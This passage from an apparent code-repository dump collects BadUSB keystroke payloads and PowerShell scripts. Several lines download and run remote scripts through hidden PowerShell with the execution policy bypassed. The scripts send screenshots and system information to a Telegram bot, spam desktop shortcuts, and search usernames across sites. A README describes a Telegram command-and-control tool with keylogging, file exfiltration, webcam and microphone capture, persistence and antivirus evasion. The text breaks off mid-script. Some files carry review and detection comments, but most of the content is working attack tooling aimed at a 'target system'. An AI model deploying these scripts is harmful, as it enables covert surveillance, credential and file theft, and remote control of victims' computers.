27 | type("powershell -NoP -Ep Bypass -W H -C $tg='TELEGRAM_TOKEN_HERE'; irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Screen-to-Telegram/main.ps1 | iex"); 28 | delay(500); 29 | press("ENTER"); 30 | -------------------------------------------------------------------------------- /Fast-Execution/Screen-to-Telegram/main.ps1: --------------------------------------------------------------------------------

# Captures the whole virtual screen to a PNG in %TEMP% and uploads it with
# curl.exe to the Telegram Bot API (sendDocument), then deletes the PNG.
#
# Review notes (observable behaviour, for triage and detection):
#  - $tg is not set in this file; the launcher shown on this page assigns it
#    on the same command line before piping this script into iex.
#  - The bot token is embedded in every request URL and in the curl.exe
#    command line, so it is visible in process-creation logs.
#  - Network indicators: requests to api.telegram.org, first /getUpdates
#    every 10 seconds until a chat id is found, then /sendDocument.
#  - Artefact: a short-lived $env:temp\sc.png.
$seconds = 30 # Screenshot interval
$a = 1 # Screenshot amount

$Token = "$tg"
$URL='https://api.telegram.org/bot{0}' -f $Token
# Poll getUpdates until the newest update carries a message, and take the
# chat id from it. The loop does not end until that happens.
while($chatID.length -eq 0){
    $updates = Invoke-RestMethod -Uri ($url + "/getUpdates")
    if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1]
    if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}}
    Sleep 10
}

While ($a -gt 0){

    Add-Type -AssemblyName System.Windows.Forms
    # VirtualScreen is the bounding rectangle of all monitors.
    $screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
    $bitmap = New-Object Drawing.Bitmap $screen.Width, $screen.Height
    $graphics = [System.Drawing.Graphics]::FromImage($bitmap)
    $graphics.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $screen.Size)
    $filePath = "$env:temp\sc.png"
    $bitmap.Save($filePath, [System.Drawing.Imaging.ImageFormat]::Png)
    $graphics.Dispose()
    $bitmap.Dispose()

    # Multipart upload of the PNG as "document" to the chat found above.
    curl.exe -F chat_id="$ChatID" -F document=@"$filePath" "https://api.telegram.org/bot$Token/sendDocument" | Out-Null
    Remove-Item -Path $filePath

    Start-Sleep $seconds
    $a--
}

-------------------------------------------------------------------------------- /Fast-Execution/Shortcut-Spam/Desktop-Shortcut-Spam.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's Desktop Shortcut Spammer. 2 | // Author: @beigeworm 3 | // Description: This script creates 100 shortcuts on the users Desktop. 4 | // Target: Windows 10 5 | 6 | // script setup 7 | layout("us") 8 | 9 | // Open Powershell and download script 10 | delay(1000); 11 | press("GUI r"); 12 | delay(1000); 13 | type("powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Shortcut-Spam/main.ps1 | iex"); 14 | delay(500); 15 | press("ENTER"); 16 | -------------------------------------------------------------------------------- /Fast-Execution/Shortcut-Spam/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Simple Shortcut Bomb

3 | 4 | 5 | SYNOPSIS 6 | 7 | This script will create 200 shortcuts on the desktop very quickly. 8 | 9 | USAGE 10 | 11 | 1. Change '100' to the number of shortcuts you want created 12 | 2. Run the script. -------------------------------------------------------------------------------- /Fast-Execution/Shortcut-Spam/main.ps1: --------------------------------------------------------------------------------
# Creates $n shortcut (.lnk) files on the current user's Desktop, each named
# "USB Hardware<random number>.lnk".
#
# Review notes:
#  - NOTE(review): the README synopsis says 200 shortcuts; the value set
#    here is 100, which is also the number the README's usage step names.
#  - Every shortcut targets C:\Windows\System32\rundll32.exe with the
#    arguments "shell32.dll,Control_RunDLL hotplug.dll" (presumably the
#    device-removal dialog, matching the "Device Removal" description -
#    TODO confirm).
#  - Clean-up: the created files all match "$Home\Desktop\USB Hardware*.lnk".
$n = 100
$i = 0

while($i -lt $n)
{
    # Get-Random supplies the numeric suffix that keeps file names distinct.
    $num = Get-Random
    $Location = "C:\Windows\System32\rundll32.exe"
    $WshShell = New-Object -ComObject WScript.Shell
    $Shortcut = $WshShell.CreateShortcut("$Home\Desktop\USB Hardware" + $num + ".lnk")
    $Shortcut.TargetPath = $Location
    $Shortcut.Arguments ="shell32.dll,Control_RunDLL hotplug.dll"
    $Shortcut.IconLocation = "hotplug.dll,0"
    $Shortcut.Description ="Device Removal"
    $Shortcut.WorkingDirectory ="C:\Windows\System32"
    $Shortcut.Save()
    Start-Sleep -Milliseconds 10
    $i++
}

-------------------------------------------------------------------------------- /Fast-Execution/Social-Search-GUI/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Social Search GUI

3 | 4 | SYNOPSIS 5 | 6 | This script presents a GUI for searching popular websites with a single username.. 7 | 8 | USAGE 9 | 10 | 1. Run script with powershell 11 | 2. Input your desired username 12 | 3. Press "Start Search" 13 | -------------------------------------------------------------------------------- /Fast-Execution/Social-Search-GUI/Username-Search-GUI.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's Username Search GUI Tool. 2 | // Author: @beigeworm 3 | // Description: This script creates a GUI for searching social media and other sites with a specified Username. 4 | // Target: Windows 10 5 | 6 | // script setup 7 | layout("us") 8 | 9 | // Open Powershell and download script 10 | delay(1000); 11 | press("GUI r"); 12 | delay(1000); 13 | type("powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Social-Search-GUI/main.ps1 | iex"); 14 | delay(500); 15 | press("ENTER"); 16 | -------------------------------------------------------------------------------- /Fast-Execution/Social-Search-GUI/main.ps1: -------------------------------------------------------------------------------- 1 | Add-Type -AssemblyName System.Windows.Forms 2 | Add-Type -AssemblyName System.Drawing 3 | Add-Type -AssemblyName Microsoft.VisualBasic 4 | [System.Windows.Forms.Application]::EnableVisualStyles() 5 | 6 | $MainWindow = New-Object System.Windows.Forms.Form 7 | $MainWindow.ClientSize = '690,700' 8 | $MainWindow.Text = "| Beigetools | Social Search |" 9 | $MainWindow.BackColor = "#242424" 10 | $MainWindow.Opacity = 1 11 | $MainWindow.TopMost = $true 12 | $MainWindow.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon("C:\Windows\System32\charmap.exe") 13 | 14 | $TextInput = New-Object System.Windows.Forms.TextBox 15 | $TextInput.Location = New-Object System.Drawing.Point(20, 40) 16 | $TextInput.BackColor = "#eeeeee" 17 | $TextInput.Width = 370 18 | 
$TextInput.Height = 40 19 | $TextInput.Font = 'Microsoft Sans Serif,12,style=Bold' 20 | $TextInput.add_MouseHover($showhelp) 21 | $TextInput.name="input" 22 | 23 | $TextInputHeader = New-Object System.Windows.Forms.Label 24 | $TextInputHeader.Text = "Username" 25 | $TextInputHeader.ForeColor = "#bcbcbc" 26 | $TextInputHeader.AutoSize = $true 27 | $TextInputHeader.Width = 25 28 | $TextInputHeader.Height = 10 29 | $TextInputHeader.Location = New-Object System.Drawing.Point(20, 20) 30 | $TextInputHeader.Font = 'Microsoft Sans Serif,10,style=Bold' 31 | 32 | $OutputBoxHeader = New-Object System.Windows.Forms.Label 33 | $OutputBoxHeader.Text = "Results" 34 | $OutputBoxHeader.ForeColor = "#bcbcbc" 35 | $OutputBoxHeader.AutoSize = $true 36 | $OutputBoxHeader.Width = 25 37 | $OutputBoxHeader.Height = 10 38 | $OutputBoxHeader.Location = New-Object System.Drawing.Point(20, 90) 39 | $OutputBoxHeader.Font = 'Microsoft Sans Serif,10,style=Bold' 40 | 41 | $OutputBox = New-Object System.Windows.Forms.TextBox 42 | $OutputBox.Multiline = $True; 43 | $OutputBox.Location = New-Object System.Drawing.Size(20,110) 44 | $OutputBox.Width = 650 45 | $OutputBox.Height = 570 46 | $OutputBox.Scrollbars = "Vertical" 47 | $OutputBox.Font = 'Microsoft Sans Serif,12,style=Bold' 48 | 49 | $DecodeBT = New-Object System.Windows.Forms.Button 50 | $DecodeBT.Text = "Start Search" 51 | $DecodeBT.Width = 150 52 | $DecodeBT.Height = 35 53 | $DecodeBT.Location = New-Object System.Drawing.Point(520, 30) 54 | $DecodeBT.Font = 'Microsoft Sans Serif,10,style=Bold' 55 | $DecodeBT.BackColor = "#eeeeee" 56 | $DecodeBT.add_MouseHover($showhelp) 57 | $DecodeBT.name="decode" 58 | 59 | $MainWindow.controls.AddRange(@($TextInput,$DecodeBT,$OutputBox,$TextInputHeader,$OutputBoxHeader)) 60 | 61 | 62 | $DecodeBT.Add_Click({ 63 | 64 | Function Add-OutputBoxLine{ 65 | Param ($outfeed) 66 | $OutputBox.AppendText("`r`n$outfeed") 67 | $OutputBox.Refresh() 68 | $OutputBox.ScrollToCaret() 69 | } 70 | 71 | 72 | $myArray = @( 73 | 
"https://twitter.com/$userhandle", 74 | "https://www.instagram.com/$userhandle/", 75 | "https://ws2.kik.com/user/$userhandle/", 76 | "https://medium.com/@$userhandle", 77 | "https://pastebin.com/u/$userhandle/", 78 | "https://www.patreon.com/$userhandle/", 79 | "https://photobucket.com/user/$userhandle/library", 80 | "https://www.pinterest.com/$userhandle/", 81 | "https://myspace.com/$userhandle/", 82 | "https://www.reddit.com/user/$userhandle/" 83 | "https://2Dimensions.com/a/$userhandle" 84 | "https://www.7cups.com/@$userhandle" 85 | "https://www.9gag.com/u/$userhandle" 86 | "https://about.me/$userhandle" 87 | "https://independent.academia.edu/$userhandle" 88 | "https://www.alik.cz/u/$userhandle" 89 | "https://www.alltrails.com/members/$userhandle" 90 | "https://www.anobii.com/$userhandle/profile" 91 | "https://discussions.apple.com/profile/$userhandle" 92 | "https://archive.org/details/@$userhandle" 93 | "https://asciinema.org/~$userhandle" 94 | "https://ask.fm/$userhandle" 95 | "https://discuss.atom.io/u/$userhandle/summary" 96 | "https://audiojungle.net/user/$userhandle" 97 | "https://www.avizo.cz/$userhandle/" 98 | "https://blip.fm/$userhandle" 99 | "https://$userhandle.booth.pm/" 100 | "https://www.behance.net/$userhandle" 101 | "https://binarysearch.io/@/$userhandle" 102 | "https://bitbucket.org/$userhandle/" 103 | "https://$userhandle.blogspot.com" 104 | "https://bodyspace.bodybuilding.com/$userhandle" 105 | "https://www.bookcrossing.com/mybookshelf/$userhandle/" 106 | "https://buzzfeed.com/$userhandle" 107 | "https://www.cnet.com/profiles/$userhandle/" 108 | "https://$userhandle.carbonmade.com" 109 | "https://career.habr.com/$userhandle" 110 | "https://beta.cent.co/@$userhandle" 111 | "https://www.championat.com/user/$userhandle" 112 | "https://www.chess.com/member/$userhandle" 113 | "https://www.cloob.com/name/$userhandle" 114 | "https://community.cloudflare.com/u/$userhandle" 115 | "https://www.codecademy.com/profiles/$userhandle" 116 | 
"https://www.codechef.com/users/$userhandle" 117 | "https://www.codewars.com/users/$userhandle" 118 | "https://www.colourlovers.com/lover/$userhandle" 119 | "https://www.coroflot.com/$userhandle" 120 | "https://www.countable.us/$userhandle" 121 | "https://www.cracked.com/members/$userhandle/" 122 | "https://$userhandle.crevado.com" 123 | "https://dev.to/$userhandleali" 124 | "https://www.dailymotion.com/$userhandle" 125 | "https://www.designspiration.net/$userhandle/" 126 | "https://$userhandle.deviantart.com" 127 | "https://www.discogs.com/user/$userhandle" 128 | "https://discuss.elastic.co/u/$userhandle" 129 | "https://disqus.com/$userhandle" 130 | "https://dribbble.com/$userhandle" 131 | "https://www.duolingo.com/profile/$userhandle" 132 | "https://ello.co/$userhandle" 133 | "https://euw.op.gg/summoner/userName=$userhandle" 134 | "https://www.eyeem.com/u/$userhandle" 135 | "https://f3.cool/$userhandle/" 136 | "https://www.facebook.com/$userhandle" 137 | "https://facenama.com/$userhandle" 138 | "https://www.flickr.com/people/$userhandle" 139 | "https://flipboard.com/@$userhandle" 140 | "https://fortnitetracker.com/profile/all/$userhandle" 141 | "https://freelance.habr.com/freelancers/$userhandle" 142 | "https://www.freelancer.com/api/users/0.1/users?usernames%5B%5D=$userhandle&compact=true" 143 | "https://freesound.org/people/$userhandle/" 144 | "https://www.gamespot.com/profile/$userhandle/" 145 | "https://giphy.com/$userhandle" 146 | "https://www.github.com/$userhandle" 147 | "https://gitlab.com/$userhandle" 148 | "https://gitee.com/$userhandle" 149 | "http://en.gravatar.com/$userhandle" 150 | "https://www.gumroad.com/$userhandle" 151 | "https://gurushots.com/$userhandle/photos" 152 | "https://hackaday.io/$userhandle" 153 | "https://news.ycombinator.com/user?id=$userhandle" 154 | "https://hackerone.com/$userhandle" 155 | "https://hackerrank.com/$userhandle" 156 | "https://www.house-mixes.com/profile/$userhandle" 157 | "https://icq.im/$userhandle" 158 | 
"https://www.ifttt.com/p/$userhandle" 159 | "https://www.instructables.com/member/$userhandle" 160 | "https://$userhandle.itch.io/" 161 | "https://$userhandle.jimdosite.com" 162 | "https://forums.kali.org/member.php?username=$userhandle" 163 | "https://keybase.io/$userhandle" 164 | "https://kik.me/$userhandle" 165 | "https://www.linux.org.ru/people/$userhandle/profile" 166 | "https://launchpad.net/~$userhandle" 167 | "https://leetcode.com/$userhandle" 168 | "https://letterboxd.com/$userhandle" 169 | "https://lichess.org/@/$userhandle" 170 | "https://$userhandle.livejournal.com" 171 | "https://www.liveleak.com/c/$userhandle" 172 | "https://lolchess.gg/profile/na/$userhandle" 173 | "https://www.memrise.com/user/$userhandle/" 174 | "https://www.mixcloud.com/$userhandle/" 175 | "https://www.munzee.com/m/$userhandle" 176 | "https://myanimelist.net/profile/$userhandle" 177 | "https://www.myminifactory.com/users/$userhandle" 178 | "https://myspace.com/$userhandle" 179 | "https://www.native-instruments.com/forum/members?username=$userhandle" 180 | "https://namemc.com/profile/$userhandle" 181 | "https://blog.naver.com/$userhandle" 182 | "https://$userhandle.newgrounds.com" 183 | "https://notabug.org/$userhandle" 184 | "https://www.openstreetmap.org/user/$userhandle" 185 | "https://opensource.com/users/$userhandle" 186 | "https://forums.pcgamer.com/members/?username=$userhandle" 187 | "https://packagist.org/packages/$userhandle/" 188 | "https://pastebin.com/u/$userhandle" 189 | "https://www.patreon.com/$userhandle" 190 | "https://www.periscope.tv/$userhandle/" 191 | "https://www.pinkbike.com/u/$userhandle/" 192 | "https://www.pinterest.com/$userhandle/" 193 | "https://plug.dj/@/$userhandle" 194 | "https://polarsteps.com/$userhandle" 195 | "https://www.producthunt.com/@$userhandle" 196 | "http://promodj.com/$userhandle" 197 | "https://pypi.org/user/$userhandle" 198 | "https://quizlet.com/$userhandle" 199 | "https://raidforums.com/User-$userhandle" 200 | 
"https://www.reddit.com/user/$userhandle" 201 | "https://repl.it/@$userhandle" 202 | "https://www.reverbnation.com/$userhandle" 203 | "https://rubygems.org/profiles/$userhandle" 204 | "https://www.scribd.com/$userhandle" 205 | "https://$userhandle.slack.com" 206 | "https://slashdot.org/~$userhandle" 207 | "https://slideshare.net/$userhandle" 208 | "https://soundcloud.com/$userhandle" 209 | "https://sourceforge.net/u/$userhandle" 210 | "https://www.sparkpeople.com/mypage.asp?id=$userhandle" 211 | "https://speedrun.com/user/$userhandle" 212 | "https://www.sporcle.com/user/$userhandle/people" 213 | "https://open.spotify.com/user/$userhandle" 214 | "https://robertsspaceindustries.com/citizens/$userhandle" 215 | "https://steamcommunity.com/id/$userhandle" 216 | "https://steamcommunity.com/groups/$userhandle" 217 | "https://steamid.uk/profile/$userhandle" 218 | "https://www.strava.com/athletes/$userhandle" 219 | "https://forum.sublimetext.com/u/$userhandle" 220 | "https://ch.tetr.io/u/$userhandle" 221 | "https://tellonym.me/$userhandle" 222 | "https://tiktok.com/@$userhandle" 223 | "https://www.gotinder.com/@$userhandle" 224 | "http://en.tm-ladder.com/$userhandle_rech.php" 225 | "https://www.tradingview.com/u/$userhandle/" 226 | "https://trello.com/$userhandle" 227 | "https://tripadvisor.com/members/$userhandle" 228 | "https://tryhackme.com/p/$userhandle" 229 | "https://www.twitch.tv/$userhandle" 230 | "https://ultimate-guitar.com/u/$userhandle" 231 | "https://unsplash.com/@$userhandle" 232 | "https://vsco.co/$userhandle" 233 | "https://forum.velomania.ru/member.php?username=$userhandle" 234 | "https://vero.co/$userhandle" 235 | "https://vimeo.com/$userhandle" 236 | "https://virgool.io/@$userhandle" 237 | "https://www.virustotal.com/ui/users/$userhandle/trusted_users" 238 | "https://www.warriorforum.com/members/$userhandle.html" 239 | "https://weheartit.com/$userhandle" 240 | "https://$userhandle.webnode.cz/" 241 | "http://www.wikidot.com/user:info/$userhandle" 242 | 
"https://www.wikipedia.org/wiki/User:$userhandle" 243 | "https://community.windy.com/user/$userhandle" 244 | "https://profiles.wordpress.org/$userhandle/" 245 | "https://xboxgamertag.com/search/$userhandle" 246 | "https://www.younow.com/$userhandle/" 247 | "https://youpic.com/photographer/$userhandle/" 248 | "https://www.youtube.com/$userhandle" 249 | "https://www.zhihu.com/people/$userhandle" 250 | "https://akniga.org/profile/$userhandle" 251 | "https://allmylinks.com/$userhandle" 252 | "https://aminoapps.com/u/$userhandle" 253 | "http://www.authorstream.com/$userhandle/" 254 | "https://www.couchsurfing.com/people/$userhandle" 255 | "https://www.geocaching.com/p/default.aspx?u=$userhandle" 256 | "https://gfycat.com/@$userhandle" 257 | "https://www.hackster.io/$userhandle" 258 | "https://www.interpals.net/$userhandle" 259 | "http://www.jeuxvideo.com/profil/$userhandle?mode=infos" 260 | "https://last.fm/user/$userhandle" 261 | "https://forum.leasehackr.com/u/$userhandle/summary/" 262 | "https://www.livelib.ru/reader/$userhandle" 263 | "https://mastodon.cloud/@$userhandle" 264 | "https://mastodon.social/@$userhandle" 265 | "https://mastodon.technology/@$userhandle" 266 | "https://mastodon.xyz/@$userhandle" 267 | "https://www.mercadolivre.com.br/perfil/$userhandle" 268 | "https://www.metacritic.com/user/$userhandle" 269 | "https://mstdn.io/@$userhandle" 270 | "https://www.nairaland.com/$userhandle" 271 | "https://note.com/$userhandle" 272 | "https://www.npmjs.com/~$userhandle" 273 | "https://osu.ppy.sh/users/$userhandle" 274 | "https://php.ru/forum/members/?username=$userhandle" 275 | "https://pr0gramm.com/user/$userhandle" 276 | "https://social.tchncs.de/@$userhandle" 277 | "http://uid.me/$userhandle" 278 | ) 279 | 280 | $userhandle = $TextInput.Text 281 | Add-OutputBoxLine -outfeed "------------------------------------------------------------------------------" 282 | Add-OutputBoxLine -outfeed "Searching Username:$userhandle Against Known Websites List..." 
283 | Add-OutputBoxLine -outfeed "------------------------------------------------------------------------------" 284 | 285 | foreach ($i in $myArray) { 286 | try{ 287 | $response = Inv`o`ke-`W`ebR`e`qu`e`st -Uri "$i" -ErrorAction Stop 288 | $StatusCode = $Response.StatusCode 289 | }catch{$StatusCode = $_.Exception.Response.StatusCode.value__} 290 | if ($StatusCode -eq "200"){ 291 | Add-OutputBoxLine -outfeed "Found one: $i$userhandle" 292 | }if ($StatusCode -eq "404"){}else {}} 293 | 294 | }) 295 | 296 | 297 | 298 | $MainWindow.ShowDialog() | Out-Null 299 | exit -------------------------------------------------------------------------------- /Fast-Execution/Telegram-C2/README.md: -------------------------------------------------------------------------------- 1 | # Beigeworm's Telegram C2 Client 2 | 3 | MAIN SCRIPT HERE - https://github.com/beigeworm/PoshGram-C2 4 | 5 | **SYNOPSIS** 6 | ------------- 7 | 8 | Using a Telegram Bot's Chat to Act as a Command and Control Server. 9 | 10 | Telegram Bots are able to both receive AND send messages. so can you use it as a C2 Server? 11 | 12 | ----------------------------------------------------------------------------------------------------------------------------- 13 | 14 | **INFORMATION** 15 | --------------- 16 | 17 | This script will wait until it is called in the Telegram chat by it's host computer name (eg. DESKTOP-WG65HY). Then Click 'Enter Commands' or 'Options' to begin the session and accept commands from Telegram chat. 18 | 19 | During a connected session, A list of Modules can be accessed by typing 'options' in chat. Or you can use the chat to act simply as a reverse shell with standard PowerShell commands. 
20 | 21 | ----------------------------------------------------------------------------------------------------------------------------- 22 | 23 | Confirmed working with no Microsoft AV detections, on a variety of Windows systems over a week or so of testing 14/08/23 24 | 25 | *(Win 10 Laptop, Win 11 Laptop, 2 Win 11 Desktops, 2 Win10 Desktops, Win 10 VM, AtlasOS Win 10 Laptop. ReviOS Win 10 Macbook w/ Bootcamp) will add more in future...* 26 | 27 | ----------------------------------------------------------------------------------------------------------------------------- 28 | 29 | **FEATURES** 30 | ------------- 31 | 32 | **Session Queue** - While running, this script waits for a start phrase (the computer name) before connecting, allowing multiple computers to wait for interaction. 33 | 34 | **Botnet Mode** - Add simultaneous sessions to control multiple computers at once. (enter computer names one after the other into chat) 35 | 36 | **Persistence** - Can add itself to startup folder (RemovePersistance command will undo this) 37 | 38 | **Auto Update** - The script checks for a newer version and updates if necessary. 39 | 40 | **Options List** - Once connected type "Options" to see a list of operations. ("ExtraInfo" will show more command info) 41 | 42 | **Pause Session** - exits the current session and script waits for re-authentication. 43 | 44 | **Key Capture Standby** - only sends messages if keys are pressed and remains idle otherwise. 45 | 46 | **File Size Intelligence** - Auto split Uploads over 50mb. 47 | 48 | **Privilege Escalation** - The ability to send the user a UAC prompt for this script and restart if successful. 49 | 50 | **Toggle Error Messaging** - Turn On or Off returning error messages to the chat. (Off by default) 51 | 52 | **Reverse shell** - apart from running the modules, once connected the chat can act as a reverse shell. 
53 | 54 | **Killswitch** - Any Modules such as "KeyCapture" and "Exfiltrate" can be killed by typing "KILL" into chat 55 | (this returns the session so it can accept further commands (does not kill the current session.)) 56 | 57 | ----------------------------------------------------------------------------------------------------------------------------- 58 | 59 | **TELEGRAM SETUP INSTRUCTIONS** 60 | ---------------------- 61 | 1. Install Telegram and make an account if you haven't already. 62 | 63 | 2. Visit https://t.me/botfather and make a bot. (make a note of the API token) 64 | 65 | 3. Click the provided link to open the chat E.G. "t.me/****bot" then type or click /start) 66 | 67 | 4. At the start off the the Script - Replace `$tg` with your Telegram Bot API Token (only when running ps1 directly (not changed using Flipper, VBScript etc as it should be pre-defined there.. eg. `$tg = 'TOKEN'`)) 68 | 69 | 5. Run the script on target system 70 | 71 | 6. Check telegram chat for 'waiting to connect' message. 72 | 73 | 7. This script has a feature to wait until you start the session from Telegram. 74 | 75 | 8. Type the computer name from the 'waiting' message into Telegram bot chat to connect to that computer's session. 76 | 77 | ----------------------------------------------------------------------------------------------------------------------------- 78 | 79 | **MODULES INFORMATION** 80 | ----------------------- 81 | 82 | `Options` : Show a menu in chat listing all the below functions 83 | 84 | `Kill` : Killswitch for `Key-Capture` and `Exfiltrate` commands (can take a few seconds to kill.) 
85 | 86 | `Extra-Info` : Extra command information and examples sent to the chat 87 | 88 | `Close` : Close the Session completely 89 | 90 | `Pause-Session` : Pauses the session (to reconnect type in the computer name again) 91 | 92 | `Toggle-Errors` : Toggle error messages to the chat ON or OFF and returns the current state to chat 93 | 94 | `Folder-Tree` : Gets Directory trees for User folders and sends it zipped to the chat 95 | 96 | `SpeechToText` : Send audio transcript to Discord 97 | 98 | `Screenshot` : Sends a screenshot of the desktop as a png file 99 | 100 | `Key-capture` : Capture Keystrokes and send them (collected keystrokes are only sent after 10 seconds of keyboard inactivity) 101 | 102 | `System-info` : Send System info as text file (system, user, hardware, ip information and more) 103 | 104 | `Enumerate-LAN` : find info on other network devices (IPv4, MAC address, Hostname, Manufacturer) (eg. `Enumerate-LAN -prefix 192.168.1`) 105 | 106 | `Add-Persistance` : Add Telegram C2 to Startup (Copy the script to a default windows location and a vbs script to the startup folder) 107 | 108 | `Remove-Persistance` : Remove Startup Persistence (Remove the ps1 script and vbs file) 109 | 110 | `Is-Admin` : Checks if session has admin Privileges and returns the result 111 | 112 | `Attempt-Elevate` : Send user a prompt to grant Administrator privileges in a new session. (if the user accepts the prompt) 113 | 114 | `Message` : Send a message in a pop-up window to connected computer `Message "Your Message Here!"` 115 | 116 | `Take-Picture` : Take a picture with any connected camera/webcam and upload to chat. 117 | 118 | `Record-Audio` : Record microphone to mp3 file and upload to chat. eg. `Record-Audio -t 100` in seconds 119 | 120 | `Record-Screen` : Record Screen to mkv file and upload to chat. eg. 
`Record-Screen -t 100` in seconds 121 | 122 | `Nearby-Wifi` : Show nearby wifi networks 123 | 124 | `Send-Hydra` : Never ending popups (use killswitch) 125 | 126 | `Exfiltrate` : Searches for, and sends, files to the chat as zip files split into 50mb each (Telegram max upload limit.) 127 | 128 | EXFILTRATION EXAMPLE COMMAND = `Exfiltrate -path [FOLDERS] -filetype [FILETYPES]` 129 | 130 | FOLDERS = Documents, Desktop, Downloads, OneDrive, Pictures, Videos 131 | 132 | FILETYPES = log, db, txt, doc, pdf, jpg, jpeg, png, wdoc, xdoc, cer, key, xls, xlsx, cfg, conf, docx, rft 133 | 134 | **ADMIN ONLY FUNCTIONS** 135 | 136 | `Disable-AV` : Attempt to exclude C:/ from Defender Scanning (Crude disable method) 137 | 138 | `Disable-HID` : Disable Mice and Keyboards on the target system 139 | 140 | `Enable-HID` : Enable Mice and Keyboards on the target system 141 | 142 | *(Commands are not case sensitive)* 143 | 144 | ----------------------------------------------------------------------------------------------------------------------------- 145 | 146 | Builder GUI example 147 | ![Screenshot_1](https://github.com/beigeworm/Powershell-Tools-and-Toys/assets/93350544/5424ba95-d4bd-4667-a2b5-cf681f049698) 148 | 149 | Telegram Chat example 150 | ![telec2](https://github.com/beigeworm/Powershell-Tools-and-Toys/assets/93350544/58ec957d-4792-4d5a-9f06-ced4ccc3408d) 151 | o 'kill' to stop 'KeyCapture' or 'Exfiltrate' command and return to waiting for commands. -------------------------------------------------------------------------------- /Fast-Execution/Telegram-C2/Telegram C2 Client.js: -------------------------------------------------------------------------------- 1 | 2 | // Title: beigeworm's Telegram Command And Control. 3 | // Author: @beigeworm 4 | // Description: Using a Telegram Bot's Chat to Act as a Command and Control Platform. 5 | // Target: Windows 10 and 11 6 | // SETUP INSTRUCTIONS 7 | // 1. visit https://t.me/botfather and make a bot. 8 | // 2. add bot api to script. 
9 | // 3. search for bot in top left box in telegram and start a chat then type /start. 10 | // 5. Run Script on target System 11 | // 6. Check telegram chat for 'waiting to connect' message. 12 | // 7. this script has a feature to wait until you start the session from telegram. 13 | // 8. type in the computer name from that message into telegram bot chat to connect to that computer. 14 | // 9. Replace TELEGRAM_BOT_API_TOKEN_HERE Below with your Telegram Bot API Token 15 | 16 | // script setup 17 | layout("us") 18 | 19 | // Open Powershell and download script 20 | delay(1000); 21 | press("GUI r"); 22 | delay(1000); 23 | type("powershell -NoP -NonI -Ep Bypass -W H -C $tg='TELEGRAM_BOT_API_TOKEN_HERE'; irm https://raw.githubusercontent.com/beigeworm/PoshGram-C2/main/Telegram-C2-Client.ps1 | iex"); 24 | delay(500); 25 | press("ENTER"); 26 | -------------------------------------------------------------------------------- /Fast-Execution/Telegram-Infostealer/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Telegram System InfoStealer

3 | 4 | SYNOPSIS 5 | 6 | This script gathers system information and posts to Telegram Bot Chat with the results. 7 | 8 | SETUP INSTRUCTIONS 9 | 10 | 1. visit https://t.me/botfather and make a bot. 11 | 2. add bot api to script. 12 | 3. search for bot in top left box in telegram and start a chat then type /start. 13 | 4. Replace YOUR_BOT_TOKEN_FOR_TELEGRAM with your bot token 14 | 5. Run Script on target System 15 | -------------------------------------------------------------------------------- /Fast-Execution/Telegram-Infostealer/System-Info-to-Telegram.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's system information to Telegram Bot 2 | // Author: @beigeworm 3 | // Description: This script gathers system information and posts to Telegram Bot Chat with the results. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace BOT_TOKEN with your Telegram bot token. 7 | 8 | // script setup 9 | layout("us") 10 | 11 | // Open Powershell and download script 12 | delay(1000); 13 | press("GUI r"); 14 | delay(1000); 15 | type("powershell -NoP -Ep Bypass -W H -C $tg='BOT_TOKEN'; irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Telegram-Infostealer/main.ps1 | iex"); 16 | delay(500); 17 | press("ENTER"); -------------------------------------------------------------------------------- /Fast-Execution/Telegram-Infostealer/main.ps1: -------------------------------------------------------------------------------- 1 | $token= "$tg" 2 | $apiUrl = "https://api.telegram.org/bot$Token/sendMessage" 3 | $URL = 'https://api.telegram.org/bot{0}' -f $Token 4 | 5 | while($chatID.length -eq 0){ 6 | $updates = Invoke-RestMethod -Uri ($url + "/getUpdates") 7 | if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1] 8 | if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}} 9 | Sleep 10 10 | } 11 | 12 | $charCodes = @(0x2705, 0x1F4BB, 0x274C, 0x1F55C, 0x1F50D, 0x1F517, 
0x23F8) 13 | $chars = $charCodes | ForEach-Object { [char]::ConvertFromUtf32($_) } 14 | $tick, $comp, $closed, $waiting, $glass, $cmde, $pause = $chars 15 | Function Post-Message{$script:params = @{chat_id = $ChatID ;text = $contents};Invoke-RestMethod -Uri $apiUrl -Method POST -Body $params} 16 | Function Post-File{curl.exe -F chat_id="$ChatID" -F document=@"$filePath" "https://api.telegram.org/bot$Token/sendDocument" | Out-Null} 17 | 18 | 19 | $contents = "$comp Gathering System Information for $env:COMPUTERNAME $comp" 20 | Post-Message 21 | $userInfo = Get-WmiObject -Class Win32_UserAccount ;$fullName = $($userInfo.FullName) ;$fullName = ("$fullName").TrimStart("") 22 | $email = (Get-ComputerInfo).WindowsRegisteredOwner 23 | $systemLocale = Get-WinSystemLocale;$systemLanguage = $systemLocale.Name 24 | $userLanguageList = Get-WinUserLanguageList;$keyboardLayoutID = $userLanguageList[0].InputMethodTips[0] 25 | $computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content 26 | $systemInfo = Get-WmiObject -Class Win32_OperatingSystem 27 | $ver = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').DisplayVersion 28 | $processorInfo = Get-WmiObject -Class Win32_Processor 29 | $computerSystemInfo = Get-WmiObject -Class Win32_ComputerSystem 30 | $userInfo = Get-WmiObject -Class 